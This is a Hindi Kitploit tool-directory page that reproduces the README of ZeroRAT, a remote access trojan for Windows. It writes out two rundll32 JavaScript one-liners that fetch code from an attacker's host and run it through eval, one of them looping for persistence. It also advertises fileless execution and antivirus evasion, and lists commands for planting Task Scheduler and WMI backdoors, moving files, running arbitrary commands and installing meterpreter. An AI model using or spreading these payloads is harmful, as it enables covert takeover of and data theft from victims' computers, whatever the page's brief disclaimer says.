Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
ZeroRAT — ZeroRAT विंडोज़ पर एक वन-लाइन रिमोट कंट्रोल है। | Kitploit
उपकरण/GitHubGitHub/5alt/zerorat
विशेषाधिकार वृद्धिपेलोड जनरेशनस्थायित्व तंत्रशोषणपार्श्व आंदोलनशेलकोडडेटा निष्कासनपोस्ट-शोषणकमांड एंड कंट्रोलरिमोट एक्सेस टूलशेलकोड जनरेशनरिमोट एक्सेस ट्रोजन
6332610 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub5alt/zerorat

ZeroRAT

ZeroRAT विंडोज़ पर एक वन-लाइन रिमोट कंट्रोल है।

रिपॉजिटरी देखें

#ZeroRAT ##परिचय विंडोज़ के लिए रिमोट कंट्रोल (RAT)। क्लाइंट को केवल एक कमांड निष्पादित करनी होती है, जो विंडोज़ के मूल प्रोग्राम का उपयोग करके चलती है, डिस्क पर कोई फ़ाइल नहीं लिखी जाती, और इसमें स्वाभाविक रूप से एंटी-वायरस से बचने (FUD) की विशेषता होती है। रीबूट के बाद निष्क्रिय हो जाता है।

प्रोग्राम में download और upload दोनों क्लाइंट के दृष्टिकोण से हैं। क्लाइंट द्वारा सर्वर से फ़ाइल डाउनलोड करना download कहलाता है, क्लाइंट द्वारा सर्वर पर फ़ाइल अपलोड करना upload कहलाता है।

##कॉन्फ़िगरेशन config.py में क्लाइंट के कनेक्ट होने का पता और बैकएंड का प्रबंधन पासवर्ड बदलें, debug को बंद करना जाँचना न भूलें।

प्रोग्राम flask और sqlite3 पर निर्भर करता है, स्वयं pip से इंस्टॉल करें

##क्लाइंट <ip>:<port> को वास्तविक कनेक्ट होने वाले पते से बदलें

सामान्य संस्करण

root@kitploit:~
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);try{h.Send();B=h.ResponseText;eval(B);}catch(e){window.close();}

अमर संस्करण

root@kitploit:~
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://<ip>:<port>/connect",false);while(1){try{h.Send();B=h.ResponseText;eval(B);}catch(e){}}

##सर्वर बैकएंड: http://<ip>:<port>/server/

सर्वर निम्नलिखित कमांड्स का समर्थन करता है:

  • sessions सक्रिय क्लाइंट्स की सूची दिखाएँ
  • use <id> id के आधार पर क्लाइंट चुनें
  • set <key> <value> ग्लोबल वेरिएबल सेट करें
  • show globals/downloads/uploads ग्लोबल वेरिएबल्स, क्लाइंट द्वारा डाउनलोड की जा सकने वाली फ़ाइलें, क्लाइंट द्वारा अपलोड की गई फ़ाइलें देखें
  • delete session वर्तमान क्लाइंट हटाएँ
  • delete download/upload <id> id के अनुसार फ़ाइल हटाएँ
  • upfile फ़ाइल को सर्वर पर अपलोड करें और downloads सूची में जोड़ें
  • download download_file और download_save_path दोनों वेरिएबल सेट करें, फिर क्लाइंट फ़ाइल डाउनलोड करके download_save_path में सहेज सकता है
  • upload upload_file वेरिएबल सेट करें, फिर क्लाइंट upload_file की फ़ाइल को सर्वर पर अपलोड कर सकता है
  • backdoor tasks <time> विंडोज़ टास्क शेड्यूलर का उपयोग करके बैकडोर छोड़ें, समय प्रारूप 00:00 है
  • backdoor wmi WMI का उपयोग करके बैकडोर छोड़ें, हर एक घंटे में निष्पादित होता है

उपरोक्त कमांड्स के अलावा, बाकी सभी को विंडोज़ सिस्टम कमांड के रूप में निष्पादित किया जाएगा

कमांड विवरण के लिए /static/js/xkcd_cli.js देखें

##विकास क्लाइंट के लिए बैकएंड कमांड /static/js/xkcd_cli.js में हैं

सर्वर के लिए बैकएंड कमांड /controllers/server.py में हैं

क्लाइंट लॉजिक /controllers/client.py में है

क्लाइंट payload निर्माण payload.py में है

डेटाबेस ऑपरेशन /models/ में हैं

##संपर्क http://5alt.me

md5_salt [AT] qq.com

##संदर्भ https://gist.github.com/subTee/f1603fa5c15d5f8825c0

http://drops.wooyun.org/tips/11764

http://drops.wooyun.org/tips/8290

http://drops.wooyun.org/tips/12354

https://github.com/chromakode/xkcdfools

http://www.kammerl.de/ascii/AsciiSignature.php

https://github.com/AlessandroZ/LaZagne

##अस्वीकरण इस टूल का उपयोग करते समय कृपया स्थानीय कानूनों का पालन करें, इसका उपयोग केवल शैक्षणिक परीक्षण के लिए किया जा सकता है, दूसरों के कंप्यूटर को अवैध रूप से नियंत्रित करना सख्त वर्जित है। यदि कोई क्षति होती है, तो इसका लेखक से कोई संबंध नहीं है।

##License GPLV3

##TODO

  • कमांड्स को बेहतर बनाना
  • संचार ट्रैफ़िक एन्क्रिप्शन
टूल डाउनलोड करें
  • meterpreter shellcode InstallUtil द्वारा shellcode निष्पादित करने की विधि से meterpreter स्थापित करें, पहले LHOST और LPORT सेट करना आवश्यक है (migrate के बाद ही कमांड स्वीकार करना जारी रख सकता है, .NET Framework 2.0 पर निर्भर)
  • meterpreter powershell Powershell विधि से meterpreter स्थापित करें (powershell 1.0 पर निर्भर)